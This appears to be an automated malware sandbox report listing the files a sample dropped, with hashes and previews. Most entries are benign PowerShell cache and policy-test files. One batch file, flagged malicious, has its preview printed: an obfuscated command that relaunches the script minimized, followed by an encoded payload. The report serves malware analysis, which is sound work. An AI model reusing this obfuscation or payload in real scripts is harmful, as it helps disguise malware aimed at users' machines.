                                    SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smwY1D:lVib49Vkjh4iUxlYvcYKib4o
                                    MD5:A7EDDF0DCC37957ABAFE63CE6D0BE4CA
                                    SHA1:5B09680EF1C3C405D698481E1364BE0C412C7A9C
                                    SHA-256:B9F314DC6C4DDB176CB92C77ECB5FCA91FB58FBE12DCFD9CEB4E8BFFC07B5327
                                    SHA-512:A906C8FFAB88AD0CEAD9A5B4D7D4089C1621A8D36F7190EF6FD829B0D942BBBC89E76424C46E204282B6985C02ABD3488082A6A2A4D88CDE396C480E2989AF73
                                    Malicious:false
                                    Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2832
                                    Entropy (8bit):5.323151611696966
                                    Encrypted:false
                                    SSDEEP:48:6AzsSU4YymI4RIoUeCa+m9qr9t5/78NV4Gx3axIZVEouNHJBV7/jCU:6AzlHYvIIfLz9qrh7KrjPEo2BN
                                    MD5:BABD377B4CD779342389D59986F8B60A
                                    SHA1:A8B4B408508AFFFEB0D7179A43732B5625E9F25F
                                    SHA-256:3C371F57A6BB2838F64BEE1F475500A3A8F012659927B17FCD54F8DEB2B5BE8D
                                    SHA-512:B265452E22DA1AFF899C15FB5993D4EA07A0F0958AB82FE2E4EE6AD3355B51E72252A081FFB2EEAA2D0E5F2762FCB3ED890128456B75AFAF3B2F44341D49E22F
                                    Malicious:false
                                    Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):64
                                    Entropy (8bit):0.34726597513537405
                                    Encrypted:false
                                    SSDEEP:3:Nlll:Nll
                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                    Malicious:false
                                    Preview:@...e...........................................................

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0eypjr0t.xpe.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1toodinm.31x.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1w0hlilp.fbk.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5j1slznj.oxi.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2ne3d0t.pwv.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3j0lpfm.a3u.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cw1jtyfo.le4.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d3qikalu.fif.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehsgaygn.agj.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i2xgbr1m.juu.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i50xp5d4.d1l.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iaxuahdl.j1u.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ignfmwbq.g1u.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iv3lhqsw.erv.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jh2yufyq.32r.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kr5pungr.4m2.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbmfwsca.vrw.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ly44mqxq.0o2.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mb43ixh4.zks.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pw0ulnel.anq.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qddsyunx.5jp.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r1qdtpxo.apj.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wdu011nm.cvz.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ynferzkp.qyn.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Roaming\Network64476Man.cmd

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:DOS batch file, ASCII text, with very long lines (65224), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):6600802
                                    Entropy (8bit):6.001268811099209
                                    Encrypted:false
                                    SSDEEP:49152:UCDi7jJ5Zk7Z4msitjW9VKbIDf3lDN7y49Xo7IztgfgfSw07KaT3nHYB3OMHK1Ml:K
                                    MD5:2ABCB1711E177E29691EA8EE499E29F6
                                    SHA1:308EE8F4AF06199342075B17EA48FADC1734B636
                                    SHA-256:A89D5D1E3559F1EA719F642C1EBA7A6F7C00B11473D02542C91F4578C0AF54E9
                                    SHA-512:C8211787681DBD34A2D2D2B56F8D49F1DAADD28CC13B6EDD9BA2E57CA4C76C93FE9363419D09032D167085215EB8E8C85D7EB3515AB96EE3EB6A6A39702EBF82
                                    Malicious:true
                                    Preview:@echo off..set "geyBcW=sezSPYdt zSPYdAzSPYdNzSPYdvTzSPYd=zSPYd1zSPYd zSPYd&&zSPYd szSPYdtzSPYdazSPYdrtzSPYd zSPYd"" zSPYd/mzSPYdin zSPYd"..set "HbaGpB=&&zSPYd zSPYdexzSPYditzSPYd"..set "CknmIU=nozSPYdt zSPYddezSPYdfizSPYdnzSPYdedzSPYd AzSPYdNzSPYdvTzSPYd..if %CknmIU:zSPYd=% (%geyBcW:zSPYd=%%0 %HbaGpB:zSPYd=%)..::YfD3eZnQ7o+pPBnDFdch5JczLrV51pLLjUwJy8Pe2UkEt20KkcDbcn/8+b7U52m0B9TX4briXbDMicSThYTX/grYYlC5LrnF8KShoSFpZy5bJmXmHYShEDMEcob94zfslJCh90rXIU7qRyCnnD18cOnI6A++1S06YWaSqraDtEjq555q4ci2NUXD1AIMHWnGx5LDpzvhHX4sp5kv1cD57bcPcuxpAzTfXqMnCI5nMlxTPwl/C6asY099VbbaI5rN7h6bKrjCg3VSZ7O0MM7WZOSHgLIoIUL73eowNwt/ubDeRn0u3gn+5hsA1TmA6z7d1pv602sBKHmWtxUVKNVm9U/eOdOPnTCDuDg4NXk5Mswd2Wqk/Gq9sUeKEFiIneG6hVMfWSIvbmZQTS3XL74dg9CXHH2fiLF2oYQw+5RDRmVSovSJIxWmVeB7Shu/wcoBrqmrGv3TpfxXoa3nxBMX5n/wcYTXR7EyBnbOB1XiV/hfKlqI3XB7kr18usQlFYJDjTGiRmCVsUdPe36lmJpnaNNjy8W84L1mYG5laFBrs5HrxraeVK0Zo3Ll0qObIsop9FOVoa2TcGsNDwkFcVmSlWdDvAU+bSoMJaAK6P9nAVvzdgmYNUO276meNeabH9ztfYW2IPLOJmYoJ9nTNpjxOlKVBahub/M7PGL0bnVIKBsrnF

                                    C:\Users\user\Desktop\mhk.cmd

                                    Download File
                                    Process:C:\Users\user\Desktop\file.exe
                                    File Type:DOS batch file, ASCII text, with very long lines (65224), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):6600802
                                    Entropy (8bit):6.001268811099209
                                    Encrypted:false
                                    SSDEEP:49152:UCDi7jJ5Zk7Z4msitjW9VKbIDf3lDN7y49Xo7IztgfgfSw07KaT3nHYB3OMHK1Ml:K
                                    MD5:2ABCB1711E177E29691EA8EE499E29F6
                                    SHA1:308EE8F4AF06199342075B17EA48FADC1734B636
                                    SHA-256:A89D5D1E3559F1EA719F642C1EBA7A6F7C00B11473D02542C91F4578C0AF54E9
